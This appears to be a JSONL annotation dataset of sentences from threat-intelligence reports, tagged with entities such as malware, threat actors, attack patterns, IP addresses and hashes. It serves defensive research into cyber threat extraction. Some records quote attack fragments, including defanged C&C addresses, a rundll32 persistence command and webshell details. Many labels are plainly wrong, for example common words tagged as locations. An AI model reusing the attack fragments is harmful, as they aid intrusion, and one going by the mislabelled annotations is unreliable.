backdoor.","entities":[],"relations":[],"Comments":[]} {"id":8210,"text":"A little over two weeks before the registration of the fake domain, the attackers sent the following email to the company: Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3378,"text":" 2243c10b1bd64dfb55eda08bc8b85610d7fa5ba759527b4b4dd16dfac584ef25","entities":[{"id":10223,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":4649,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} {"id":7336,"text":"on Host","entities":[],"relations":[],"Comments":[]} {"id":9340,"text":"Trend Micro detects both of the threats as AndroidOS_CallerSpy.HRX.","entities":[],"relations":[],"Comments":[]} {"id":682,"text":"In a similar way to embedding Adobe Flash files into an Office document, you can also embed equations in documents that will be parsed by Microsoft Equation Editor - a program that lets you easily write mathematical equations: Figure 2. Microsoft Equation Editor As in our previous example, vulnerabilities in the equation editor can be exploited by leveraging malicious Office documents.","entities":[{"id":46257,"label":"SOFTWARE","start_offset":30,"end_offset":41},{"id":46258,"label":"SOFTWARE","start_offset":138,"end_offset":163},{"id":46256,"label":"SOFTWARE","start_offset":238,"end_offset":263}],"relations":[],"Comments":[]} {"id":3006,"text":"This will also protect these apps on your tablets, smartphones, PCs and Macs.","entities":[],"relations":[],"Comments":[]} {"id":12815,"text":"Joint Operations.","entities":[],"relations":[],"Comments":[]} {"id":3302,"text":" GetBrowsersCookies This command is designed to steal cookie information from browsers.","entities":[],"relations":[],"Comments":[]} {"id":3427,"text":"Backdoor.","entities":[],"relations":[],"Comments":[]} {"id":12977,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[{"id":40404,"label":"location","start_offset":53,"end_offset":56},{"id":40405,"label":"tools","start_offset":71,"end_offset":77},{"id":40406,"label":"location","start_offset":78,"end_offset":81},{"id":40407,"label":"location","start_offset":82,"end_offset":90},{"id":40408,"label":"location","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} {"id":5839,"text":"Ed: Exactly.","entities":[],"relations":[],"Comments":[]} {"id":623,"text":"One technique includes the ETERNALBLUE exploit tool.","entities":[{"id":2083,"label":"malware","start_offset":28,"end_offset":39}],"relations":[],"Comments":[]} {"id":847,"text":" Kernel APC attacks do this using their control over the kernel to redirect APCs: \u201cAsynchronous Procedure Calls\u201d.","entities":[{"id":46395,"label":"attack-pattern","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":2622,"text":" If you think you may be subject to an active attack or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":45625,"label":"location","start_offset":241,"end_offset":246},{"id":45627,"label":"location","start_offset":217,"end_offset":221},{"id":45624,"label":"location","start_offset":140,"end_offset":153},{"id":45626,"label":"location","start_offset":194,"end_offset":198},{"id":45623,"label":"identity","start_offset":101,"end_offset":131}],"relations":[],"Comments":[]} {"id":1519,"text":" The Src IP Begin and End are the start and ending IP ranges used as a fake src addresses in the DNS DDoS. The IP range can also be controlled by global variables within the binary itself as well.","entities":[],"relations":[],"Comments":[]} {"id":3299,"text":"Figures 21 and 22 show the result of running \u201cSnsInfo\u201d command to enumerate messengers.","entities":[],"relations":[],"Comments":[]} {"id":9493,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":9404,"text":"Used to suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed Discovery File and Directory Discovery T1420","entities":[{"id":28948,"label":"attack-pattern","start_offset":135,"end_offset":163}],"relations":[],"Comments":[]} {"id":2506,"text":"shell13.jsp","entities":[{"id":47674,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3474,"text":"Protux, a known backdoor, is executed by abusing the rundll32 dynamic-link library (DLL).","entities":[{"id":49273,"label":"malware","start_offset":0,"end_offset":6},{"id":49274,"label":"attack-pattern","start_offset":41,"end_offset":88}],"relations":[{"id":777,"from_id":49273,"to_id":49274,"type":"uses"}],"Comments":[]} {"id":1030,"text":"Accounts made through this site \"can be used to apply [for] related memberships of Amazon Prime, Microsoft Developer, Adobe and Apple by some secret ways,\" one seller said.","entities":[{"id":46519,"label":"identity","start_offset":83,"end_offset":95},{"id":46522,"label":"identity","start_offset":128,"end_offset":133},{"id":46520,"label":"identity","start_offset":97,"end_offset":106},{"id":46521,"label":"identity","start_offset":118,"end_offset":123}],"relations":[],"Comments":[]} {"id":1481,"text":"The app developer industry is booming.","entities":[],"relations":[],"Comments":[]} {"id":1416,"text":" Geographic Distribution of Koluoz Spam Nodes in North America Thus far we\u2019ve detected the following command and control servers in use.","entities":[{"id":45013,"label":"Infrastucture","start_offset":35,"end_offset":45},{"id":45016,"label":"Infrastucture","start_offset":103,"end_offset":121},{"id":45012,"label":"malware","start_offset":28,"end_offset":34},{"id":45014,"label":"location","start_offset":49,"end_offset":62}],"relations":[{"id":55,"from_id":45012,"to_id":45013,"type":"communicates-with"},{"id":56,"from_id":45013,"to_id":45014,"type":"located-at"}],"Comments":[]} {"id":950,"text":"The apps this library is embedded in may be legitimate and have significant functionality, but their developer\u2019s choice to use this library has put them at risk. Technical Details:","entities":[],"relations":[],"Comments":[]} {"id":14254,"text":" C&C Server's IP Address Port Number 160[.]16[.]243[.]129 443 (HTTPS) 160[.]16[.]243[.]129 53 (DNS) 160[.]16[.]243[.]129 80 (HTTP) 174[.]139[.]203[.]18 443 (HTTPS) 174[.]139[.]203[.]18 53 (DNS) 174[.]139[.]203[.]20 53 (DNS) 174[.]139[.]203[.]22 443 (HTTPS) 174[.]139[.]203[.]22 53 (DNS) 174[.]139[.]203[.]27 53 (DNS) 174[.]139[.]203[.]34 53 (DNS) 174[.]139[.]62[.]58 80 (HTTP) 174[.]139[.]62[.]60 443 (HTTPS) 174[.]139[.]62[.]60 53 (DNS) 174[.]139[.]62[.]60 80 (HTTP) 174[.]139[.]62[.]61 443 (HTTPS) 61[.]195[.]98[.]245 443 (HTTPS) 61[.]195[.]98[.]245 53 (DNS) 61[.]195[.]98[.]245 80 (HTTP) 67[.]198[.]161[.]250 443 (HTTPS) 67[.]198[.]161[.]250 53 (DNS) 67[.]198[.]161[.]251 443 (HTTPS) 67[.]198[.]161[.]252 443 (HTTPS) Figure 6: IP addresses used for C&C communication, and the port numbers they use","entities":[{"id":44095,"label":"IPV4","start_offset":37,"end_offset":57},{"id":44096,"label":"IPV4","start_offset":70,"end_offset":90},{"id":44097,"label":"IPV4","start_offset":100,"end_offset":120},{"id":44098,"label":"IPV4","start_offset":131,"end_offset":151},{"id":44099,"label":"IPV4","start_offset":164,"end_offset":184},{"id":44100,"label":"IPV4","start_offset":194,"end_offset":214},{"id":44101,"label":"IPV4","start_offset":224,"end_offset":244},{"id":44102,"label":"IPV4","start_offset":257,"end_offset":277},{"id":44103,"label":"IPV4","start_offset":287,"end_offset":307},{"id":44104,"label":"IPV4","start_offset":317,"end_offset":337},{"id":44105,"label":"IPV4","start_offset":347,"end_offset":366},{"id":44106,"label":"IPV4","start_offset":377,"end_offset":396},{"id":44107,"label":"IPV4","start_offset":409,"end_offset":428},{"id":44108,"label":"IPV4","start_offset":438,"end_offset":457},{"id":44109,"label":"IPV4","start_offset":468,"end_offset":487},{"id":44110,"label":"IPV4","start_offset":500,"end_offset":519},{"id":44111,"label":"IPV4","start_offset":532,"end_offset":551},{"id":44112,"label":"IPV4","start_offset":561,"end_offset":580},{"id":44113,"label":"IPV4","start_offset":591,"end_offset":611},{"id":44114,"label":"IPV4","start_offset":624,"end_offset":644},{"id":44115,"label":"IPV4","start_offset":654,"end_offset":674},{"id":44116,"label":"IPV4","start_offset":687,"end_offset":707}],"relations":[],"Comments":[]} {"id":10156,"text":"By looking at the digital fingerprints of these phishing sites and comparing them with a large data set that spans almost five years, we can uniquely relate them to a couple of Pawn Storm incidents in 2016 and 2017.","entities":[{"id":30989,"label":"attack-pattern","start_offset":48,"end_offset":56},{"id":30990,"label":"location","start_offset":57,"end_offset":62},{"id":30991,"label":"location","start_offset":63,"end_offset":66},{"id":30992,"label":"location","start_offset":77,"end_offset":81},{"id":30993,"label":"location","start_offset":89,"end_offset":94},{"id":30995,"label":"location","start_offset":137,"end_offset":140},{"id":30996,"label":"location","start_offset":157,"end_offset":161},{"id":30999,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} {"id":4811,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50729,"label":"SOFTWARE","start_offset":78,"end_offset":89},{"id":50730,"label":"TIME","start_offset":116,"end_offset":126},{"id":50731,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50727,"label":"threat-actor","start_offset":34,"end_offset":39},{"id":50728,"label":"malware","start_offset":40,"end_offset":49}],"relations":[{"id":998,"from_id":50727,"to_id":50728,"type":"uses"}],"Comments":[]} {"id":3940,"text":"xml;charset","entities":[],"relations":[],"Comments":[]} {"id":9825,"text":"Gets MAC address and volume information to send back to the C&C. Executes only during working hours (8:00AM-6:00PM, using kernel32.GetLocalTime API)","entities":[{"id":29957,"label":"location","start_offset":17,"end_offset":20},{"id":29958,"label":"location","start_offset":74,"end_offset":78},{"id":29959,"label":"TIME","start_offset":101,"end_offset":121}],"relations":[],"Comments":[]} {"id":7796,"text":"However, while initial analysis of the macro it used made us believe that this was from TA505, the macros\u2019 obfuscation and style turned out to be more similar to the ones described in this post, based on the code page, senders, and fast flux.","entities":[{"id":24146,"label":"location","start_offset":53,"end_offset":57},{"id":24148,"label":"location","start_offset":119,"end_offset":122},{"id":24149,"label":"location","start_offset":189,"end_offset":193},{"id":24150,"label":"malware","start_offset":213,"end_offset":217},{"id":24151,"label":"location","start_offset":228,"end_offset":231}],"relations":[],"Comments":[]} {"id":1420,"text":"WildFire users can rest assured that they\u2019ll be protected from whatever Kuluoz has in-store next.","entities":[{"id":46758,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":46759,"label":"malware","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":6471,"text":"The name SharpChisel may be related to the purpose of this file, which is a C# wrapper for a tunneling tool called chisel.","entities":[{"id":20113,"label":"location","start_offset":21,"end_offset":24},{"id":20114,"label":"location","start_offset":103,"end_offset":107},{"id":20115,"label":"malware","start_offset":115,"end_offset":121}],"relations":[],"Comments":[]} {"id":5041,"text":"We also send all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51125,"label":"SOFTWARE","start_offset":36,"end_offset":45},{"id":51124,"label":"SOFTWARE","start_offset":26,"end_offset":31}],"relations":[],"Comments":[]} {"id":9309,"text":"Billing address (city) bill_to_zip nn","entities":[],"relations":[],"Comments":[]} {"id":832,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2811,"text":" Unit 42 is following this situation very closely and will update this blog with any new information as it becomes available.","entities":[{"id":45705,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":581,"text":"Palo Alto Networks customers are further protected from ransomware.","entities":[{"id":46178,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":2475,"text":"This particular webshell will load a base64 encoded class that will contain the functionality desired by the actor.","entities":[],"relations":[],"Comments":[]} {"id":1966,"text":" The RDG client responds once again with a Client Hello packet containing the received cookie, which will initiate the DTLS handshake (RFC6347 Section 4.2). Figure 1: Initiation of the DTLS handshake between RDG client and server Figure 2: RDG client and server handshake phase (Source: [MS-TSGU] Section 1.3.3.1.1)","entities":[],"relations":[],"Comments":[]} {"id":2819,"text":" The attack uses this vulnerability to spread the WanaCrypt0r ransomware on the network.","entities":[{"id":8612,"label":"malware","start_offset":50,"end_offset":61}],"relations":[],"Comments":[]} {"id":1165,"text":"Idiosyncrasies of the malware author become apparent, the evolution can be traced, the availability or quality of code deduced, and reuse of functionality made clear with a simple mutex.","entities":[],"relations":[],"Comments":[]} {"id":6979,"text":" Figure 14. CrimsonRAT malware hosted in viral91[.]xyz We were also able to source a phishing document, \u201ccsd_car_price_list_2017,\u201d that is related to this domain and has been seen in the wild in 2017.","entities":[{"id":21868,"label":"attack-pattern","start_offset":84,"end_offset":90},{"id":21869,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21870,"label":"location","start_offset":170,"end_offset":173}],"relations":[],"Comments":[]} {"id":11807,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[{"id":36416,"label":"location","start_offset":83,"end_offset":86},{"id":36417,"label":"location","start_offset":126,"end_offset":129},{"id":36418,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":36419,"label":"location","start_offset":168,"end_offset":173},{"id":36420,"label":"location","start_offset":177,"end_offset":181},{"id":36421,"label":"location","start_offset":182,"end_offset":186}],"relations":[],"Comments":[]} {"id":517,"text":"From this lens, the top three families observed are Ryuk (31.7%), Sodinokibi (20%) and Maze (15%). Emails are still the most efficient method to deliver and propagate ransomware.","entities":[{"id":46146,"label":"malware","start_offset":52,"end_offset":56},{"id":46147,"label":"malware","start_offset":66,"end_offset":76},{"id":46148,"label":"malware","start_offset":87,"end_offset":91}],"relations":[],"Comments":[]} {"id":3659,"text":"Although both names have at times been used to refer to the same group, organizations such as MITRE identifies them as two separate entities that wield the Carbanak backdoor in their attacks.","entities":[{"id":49429,"label":"identity","start_offset":94,"end_offset":99},{"id":49432,"label":"malware","start_offset":156,"end_offset":173}],"relations":[],"Comments":[]} {"id":2598,"text":" Apart from Argentinian eCommerce provider Mercado Libre \/ Mercado Pago, subsequent victimology has departed South America and pivoted to focus on the high-tech sector. Recent public victims have included: It should be understood that in addition there are likely any number of other victims, targeted by attacks not known in the public sphere.","entities":[{"id":45606,"label":"location","start_offset":12,"end_offset":23},{"id":45608,"label":"identity","start_offset":43,"end_offset":56},{"id":45609,"label":"identity","start_offset":59,"end_offset":71},{"id":45610,"label":"location","start_offset":109,"end_offset":122}],"relations":[{"id":357,"from_id":45608,"to_id":45606,"type":"located-at"},{"id":358,"from_id":45609,"to_id":45606,"type":"located-at"},{"id":359,"from_id":45609,"to_id":45608,"type":"related-to"}],"Comments":[]} {"id":823,"text":" The patch provided by Microsoft included the typical release of operating system patches, but this time a new Application Programming Interface (API) function was added.","entities":[{"id":46371,"label":"SOFTWARE","start_offset":23,"end_offset":32}],"relations":[],"Comments":[]} {"id":3969,"text":"Use multi-factor authentication whenever possible and regularly update it.","entities":[],"relations":[],"Comments":[]} {"id":10872,"text":"Similar malicious samples","entities":[],"relations":[],"Comments":[]} {"id":12804,"text":"All Roads Lead to BlackTech","entities":[{"id":39873,"label":"threat-actor","start_offset":10,"end_offset":14},{"id":39874,"label":"threat-actor","start_offset":18,"end_offset":27}],"relations":[],"Comments":[]} {"id":520,"text":"Web browsing is the second most common entry vector for ransomware infections.","entities":[],"relations":[],"Comments":[]} {"id":357,"text":" As Heartbleed allows the attacker to scrape memory from the vulnerable device, they can retrieve significant amounts of secret information.","entities":[{"id":44716,"label":"attack-pattern","start_offset":38,"end_offset":51},{"id":44715,"label":"vulnerability","start_offset":4,"end_offset":14}],"relations":[{"id":153,"from_id":44715,"to_id":44716,"type":"targets"}],"Comments":[]} {"id":211,"text":" Additionally the kernel module responsible for the actual wiping activity is from a legitimate application called EaseUS Partition Master.","entities":[{"id":45907,"label":"tools","start_offset":115,"end_offset":138}],"relations":[],"Comments":[]} {"id":2400,"text":"The CVE-2022-22965 vulnerability allows an attacker unauthenticated remote code execution (RCE), which Unit 42 has observed being exploited in the wild.","entities":[{"id":45495,"label":"vulnerability","start_offset":4,"end_offset":18},{"id":45496,"label":"attack-pattern","start_offset":52,"end_offset":89},{"id":45497,"label":"identity","start_offset":103,"end_offset":110}],"relations":[{"id":105,"from_id":45496,"to_id":45495,"type":"delivers"}],"Comments":[]} {"id":658,"text":"The WannaCry attacks in May, 2017 demonstrated that many Windows systems had not been patched for this vulnerability.","entities":[{"id":2160,"label":"malware","start_offset":4,"end_offset":12},{"id":46236,"label":"TIME","start_offset":24,"end_offset":33},{"id":46237,"label":"SOFTWARE","start_offset":57,"end_offset":64}],"relations":[],"Comments":[]} {"id":7325,"text":"Figure 21.","entities":[],"relations":[],"Comments":[]} {"id":3702,"text":"To steal these, both groups employed credential dumping and input capture.","entities":[{"id":11230,"label":"attack-pattern","start_offset":37,"end_offset":55},{"id":11232,"label":"attack-pattern","start_offset":60,"end_offset":73}],"relations":[],"Comments":[]} {"id":10298,"text":"Troj.Win32.TRX.XXPE50FFF039 b61e0f68772f3557024325f3a05e4edb940dbbe380af00f3bdaaaeabda308e72 igmtSX.exe","entities":[{"id":31450,"label":"SHA1","start_offset":29,"end_offset":93}],"relations":[],"Comments":[]} {"id":12997,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[{"id":40484,"label":"attack-pattern","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} {"id":9648,"text":"For regular user path: ~\/Library\/Spelling\/ processname: spellagentd","entities":[],"relations":[],"Comments":[]} {"id":2341,"text":"These two functions are used in conjunction to dynamically load a shared object into memory and retrieve the address of a symbol from it.","entities":[],"relations":[],"Comments":[]} {"id":9750,"text":"Running this registry file adds the following command to the Run registry key: rundll32 %Temp%\\png.dll,RunPow Figure 3.","entities":[{"id":29734,"label":"attack-pattern","start_offset":79,"end_offset":87}],"relations":[],"Comments":[]} {"id":13128,"text":"The expansive use of open source code by DevOps teams adds another element of risk which requires urgent attention.","entities":[],"relations":[],"Comments":[]} {"id":10178,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":31068,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} {"id":4027,"text":"It is our aim, through this article, to encourage enterprises to review their own security setting and protect themselves from damage and compromise.","entities":[],"relations":[],"Comments":[]} {"id":1668,"text":"The client combines this with the password and generates the same key.","entities":[],"relations":[],"Comments":[]} {"id":3774,"text":" Cortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public internet, and can be leveraged to enumerate potentially vulnerable instances within customer networks.","entities":[{"id":49607,"label":"SOFTWARE","start_offset":1,"end_offset":14},{"id":49608,"label":"SOFTWARE","start_offset":54,"end_offset":81}],"relations":[],"Comments":[]} {"id":10132,"text":"The method, which we first discussed in 2014, involves changing a browser tab to point to a phishing site after distracting the target.","entities":[{"id":30896,"label":"location","start_offset":74,"end_offset":77},{"id":30897,"label":"location","start_offset":81,"end_offset":86},{"id":30898,"label":"attack-pattern","start_offset":92,"end_offset":100},{"id":30899,"label":"location","start_offset":128,"end_offset":134}],"relations":[],"Comments":[]} {"id":1754,"text":"In his slides, he mentioned that a \"god mode\" of Internet Explorer could be turned on by a one byte overwrite.","entities":[{"id":46906,"label":"SOFTWARE","start_offset":49,"end_offset":66}],"relations":[],"Comments":[]} {"id":1592,"text":" Version Summary October 24, 2017 2:30 p.m. PT Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46837,"label":"TIME","start_offset":18,"end_offset":47}],"relations":[],"Comments":[]} {"id":1773,"text":" Here, xyz indicates a user-controlled address that contains the length of a vector object or length of an Int32Array.","entities":[],"relations":[],"Comments":[]} {"id":2334,"text":"day or 0-day?","entities":[],"relations":[],"Comments":[]} {"id":204,"text":" On Feb. 18, both the United States and the United Kingdom attributed these DDoS attacks to Russia\u2019s Main Intelligence Directorate (GRU). Over the past week, Ukraine has continued to observe a relatively constant flow of DDoS attacks targeting its government and financial institutions.","entities":[{"id":44621,"label":"identity","start_offset":22,"end_offset":35},{"id":44622,"label":"TIME","start_offset":4,"end_offset":11},{"id":44623,"label":"identity","start_offset":44,"end_offset":58},{"id":44624,"label":"attack-pattern","start_offset":76,"end_offset":80},{"id":44625,"label":"threat-actor","start_offset":92,"end_offset":136},{"id":44626,"label":"identity","start_offset":159,"end_offset":166},{"id":44627,"label":"attack-pattern","start_offset":222,"end_offset":234},{"id":44628,"label":"identity","start_offset":249,"end_offset":286}],"relations":[{"id":4,"from_id":44624,"to_id":44625,"type":"attributed-to"},{"id":131,"from_id":44627,"to_id":44628,"type":"targets"}],"Comments":[]} {"id":14021,"text":"Instead, it is determined by the operating system language at the time of the version resource inclusion.","entities":[],"relations":[],"Comments":[]} {"id":907,"text":" Once files are identified, PClock will begin encrypting them, one-by-one.","entities":[{"id":46430,"label":"malware","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} {"id":7618,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} {"id":479,"text":"About: Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} {"id":7265,"text":" Figures 1-2.","entities":[],"relations":[],"Comments":[]} {"id":4929,"text":"This means that there is typically more than one threat actor behind the warnings.","entities":[],"relations":[],"Comments":[]} {"id":5427,"text":"Having a distributed infrastructure also makes it more difficult for cybersecurity teams to take down the whole attack.","entities":[],"relations":[],"Comments":[]} {"id":7138,"text":"This shows that the threat actors intended to confuse forensics investigators with incorrect timestamps, which is why it\u2019s critical to analyze timestamps with caution during investigations.","entities":[],"relations":[],"Comments":[]} {"id":8501,"text":"This is the second directive the TSA issued to the pipeline sector this 2021, building on the initial Security Directive released on May 2021 following the ransomware attack on Colonial Pipeline by DarkSide.","entities":[],"relations":[],"Comments":[]} {"id":14126,"text":"At the same time, we were able to locate the Mattermost server hosted in Greece, and that gave us the current time zone of the Mattermost server.","entities":[{"id":48192,"label":"location","start_offset":73,"end_offset":79},{"id":48191,"label":"Infrastucture","start_offset":127,"end_offset":144},{"id":48193,"label":"Infrastucture","start_offset":45,"end_offset":62}],"relations":[{"id":392,"from_id":48191,"to_id":48192,"type":"located-at"},{"id":393,"from_id":48193,"to_id":48192,"type":"located-at"}],"Comments":[]} {"id":3542,"text":"Trend Micro solutions","entities":[{"id":49318,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":2602,"text":"Several of the Lapsus$ Group\u2019s attacks involved the theft and publication of source code.","entities":[{"id":47790,"label":"threat-actor","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} {"id":3742,"text":"This is also the earliest date at which Unit 42 observed exploitation attempts and scanning activity. 2022-04-13: VMware advisory updated with knowledge of active exploitation of CVE-2022-22954 in the wild.","entities":[{"id":49562,"label":"TIME","start_offset":103,"end_offset":113},{"id":49563,"label":"identity","start_offset":115,"end_offset":121},{"id":49561,"label":"identity","start_offset":40,"end_offset":47},{"id":49564,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} {"id":2491,"text":" While CVE-2022-22963 is a different vulnerability in Spring Cloud Function (not technically part of SpringShell), a Threat Prevention signature is also available to ensure coverage at the perimeter.","entities":[{"id":47575,"label":"vulnerability","start_offset":101,"end_offset":112},{"id":47573,"label":"vulnerability","start_offset":7,"end_offset":21},{"id":47574,"label":"SOFTWARE","start_offset":54,"end_offset":66}],"relations":[{"id":341,"from_id":47574,"to_id":47573,"type":"has"}],"Comments":[]} {"id":13826,"text":"The rest of the routine is all placed in \u201cGetRTTAndHopCount.\u201d","entities":[],"relations":[],"Comments":[]} {"id":6925,"text":"Exploiting CVE-2019-0676 enabled attackers to reveal presence or non-presence of files on the victim\u2019s computer; this information was later used to decide whether or not a second stage exploit should be delivered.","entities":[],"relations":[],"Comments":[]} {"id":8032,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":24913,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":24914,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} {"id":3282,"text":"It writes the basic config and RTMP config of OBS and then starts the OBS process to monitor the victim\u2019s desktop using RTMP live streaming to the cloud.","entities":[],"relations":[],"Comments":[]} {"id":3918,"text":"<%@ Page Language=\"Jscript\" Debug=true%>","entities":[],"relations":[],"Comments":[]} {"id":4834,"text":"Today, we're sharing intelligence on a segment of attackers we call hack-for-hire, whose niche focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50791,"label":"attack-pattern","start_offset":68,"end_offset":81}],"relations":[],"Comments":[]} {"id":855,"text":"And while this technique alone isn\u2019t solely responsible for the damaging power of WanaCrypt0r\/WannaCry and Petya\/NotPetya it is certainly an important contributing factor.","entities":[{"id":2781,"label":"malware","start_offset":82,"end_offset":93},{"id":2784,"label":"malware","start_offset":107,"end_offset":112},{"id":44893,"label":"malware","start_offset":94,"end_offset":102},{"id":44895,"label":"malware","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} {"id":9416,"text":"This malware lineup includes tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, and a brand-new multistage malware family that we have dubbed PuppetLoader.","entities":[{"id":28978,"label":"location","start_offset":35,"end_offset":38},{"id":28979,"label":"malware","start_offset":96,"end_offset":101},{"id":28980,"label":"location","start_offset":102,"end_offset":105},{"id":28981,"label":"malware","start_offset":106,"end_offset":115},{"id":28982,"label":"location","start_offset":117,"end_offset":120},{"id":28983,"label":"location","start_offset":123,"end_offset":128},{"id":28984,"label":"malware","start_offset":179,"end_offset":191}],"relations":[],"Comments":[]} {"id":13066,"text":"Published New White Paper: Practical Risk Assessments for Smart Factories","entities":[],"relations":[],"Comments":[]} {"id":3374,"text":"Silverlight_ins.exe BIOPASS RAT Loader","entities":[{"id":10218,"label":"malware","start_offset":21,"end_offset":32},{"id":49020,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[{"id":557,"from_id":49020,"to_id":10218,"type":"indicates"}],"Comments":[]} {"id":7747,"text":"The attached document asks the user to enable the macros, which creates an Internet Explorer object instance.","entities":[],"relations":[],"Comments":[]} {"id":11684,"text":"These documents and news are probably interesting in some way to their targets and are used to make them click and log in to the phishing pages.","entities":[{"id":35831,"label":"location","start_offset":16,"end_offset":19},{"id":35832,"label":"location","start_offset":25,"end_offset":28},{"id":35833,"label":"location","start_offset":58,"end_offset":61},{"id":35834,"label":"location","start_offset":79,"end_offset":82},{"id":35835,"label":"location","start_offset":83,"end_offset":86},{"id":35836,"label":"location","start_offset":100,"end_offset":104},{"id":35837,"label":"location","start_offset":111,"end_offset":114},{"id":35838,"label":"attack-pattern","start_offset":129,"end_offset":137}],"relations":[],"Comments":[]} {"id":2232,"text":"In the event the supplied argument was C:\\malware.exe, the registry key would be named \u2018malware\u2019, and the path for this key would be \u2018C:\\malware.exe\u2019. The persistence thread runs in a loop where the registry keys are set every 60 seconds, ensuring persistence even in the event an administrator manually deletes the registry keys.","entities":[{"id":45426,"label":"FILEPATH","start_offset":39,"end_offset":53},{"id":45427,"label":"FILEPATH","start_offset":134,"end_offset":148},{"id":6655,"label":"TIME","start_offset":222,"end_offset":238}],"relations":[],"Comments":[]} {"id":5063,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":51170,"label":"attack-pattern","start_offset":111,"end_offset":173},{"id":51169,"label":"threat-actor","start_offset":0,"end_offset":11}],"relations":[{"id":1066,"from_id":51169,"to_id":51170,"type":"uses"}],"Comments":[]} {"id":4576,"text":"These phishing domains have been blocked through Google Safe Browsing \u2013 a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[],"relations":[],"Comments":[]} {"id":3935,"text":"It proceeded with copying the Chopper web shell into accessible shared folders in other hosts to gain access.","entities":[{"id":49777,"label":"malware","start_offset":30,"end_offset":47}],"relations":[],"Comments":[]} {"id":2304,"text":"iOS Exploits","entities":[{"id":45455,"label":"SOFTWARE","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":14357,"text":"The attackers were found using the HTTP protocol to transfer data.","entities":[],"relations":[],"Comments":[]} {"id":2032,"text":" With HelloXD version 2, the author(s) opted to alter the encryption routine, swapping out the modified HC-128 algorithm with the Rabbit symmetric cipher.","entities":[{"id":6049,"label":"malware","start_offset":6,"end_offset":13}],"relations":[],"Comments":[]} {"id":890,"text":" PClock2 also enables persistence by setting the following registry key.","entities":[{"id":46421,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":6681,"text":" The full extent of the attack is currently unknown.","entities":[],"relations":[],"Comments":[]} {"id":3239,"text":"The second HTTP server behaves the same as the first but returns a string, \u201cdm_online\u201d, instead.","entities":[],"relations":[],"Comments":[]} {"id":6949,"text":"Aside from the Crimson RAT malware, the Earth Karkaddan APT group is also known to use the ObliqueRat malware in its campaigns.","entities":[{"id":21753,"label":"location","start_offset":40,"end_offset":45},{"id":21754,"label":"location","start_offset":56,"end_offset":59},{"id":21755,"label":"malware","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} {"id":1141,"text":"While programmatic analysis would have a hard time associating the two, it's obvious to a human that the same face rolling technique was used to name this mutex.","entities":[],"relations":[],"Comments":[]} {"id":5171,"text":" DDS is integral in embedded systems that require real-time machine-to-machine communication, facilitating a reliable communication layer between sensors, controllers, and actuators.","entities":[],"relations":[],"Comments":[]} {"id":2118,"text":" Vulnerability Information","entities":[],"relations":[],"Comments":[]} {"id":8,"text":"This tactic is a nightmare for legacy security products that are based on legacy techniques such as bytes signatures, since they can only detect attacks after the damage is done instead of preventing it as a true solution should.","entities":[],"relations":[],"Comments":[]} {"id":1929,"text":"But this link is further fortified by the Android applications we found whose code is like that of Bahamut, with the C&C matching the usual name registration pattern of Patchwork\u2019s group, as well as an infrastructure close to an old Patchwork 